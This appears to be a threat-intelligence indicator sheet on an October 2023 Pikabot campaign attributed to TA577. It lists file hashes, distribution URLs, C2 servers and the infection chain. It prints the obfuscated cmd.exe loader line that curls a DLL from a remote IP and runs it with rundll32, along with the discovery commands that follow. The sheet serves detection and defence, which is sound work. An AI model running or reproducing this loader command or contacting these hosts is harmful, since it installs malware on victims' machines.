23.10.2023 | Pikabot | TA577 | version: 1.1.15-ghost

*************************************************

.url https://pantiwilasa.app/teq/?1337
.zip cb685ba5b5e7bfe686839722d96ed6b9a13b95f61902d23f7b1e27632d569f9f
.dll 15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347

*************************************************

url > zip > js > curl > dll

wscript.exe C:\Users\Admin\AppData\Local\Temp\R812.js

cmd.exe" /c xrN || eCho xrN & pinG xrN || CuRL http://45.32.194.209/OpW40B/preju -o %TMP%\xrN.dll & pinG -n 4 xrN || RUndLl32 %TMp%\xrN.dll, Crash & exiT FOBKz=gjStdz

pinG  xrN 

pinG  -n 4 xrN 

RUndLl32  C:\Users\Admin\AppData\Local\Temp\xrN.dll, Crash

SearchProtocolHost.exe

whoami.exe /all

ipconfig.exe /all

netstat.exe -aon

rundll32.exe C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

svchost.exe -k UnistackSvcGroup

*************************************************

distro url

https://pantiwilasa.app/teq/?1337

*************************************************

.dll distro

http://45.32.194.209/OpW40B/preju
http://64.176.214.231/RtJO/phlob
http://66.42.96.41/QIz/overs

*************************************************

c2's

https://155.138.156.94:5243/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.221.30.136:13724/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://51.68.146.19:5242/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.92.19.139:2222/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://15.235.143.190:2224/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker

https://15.235.143.190:2224
https://155.138.156.94:5243
https://51.68.146.19:5242
https://154.221.30.136:13724
https://154.92.19.139:2222

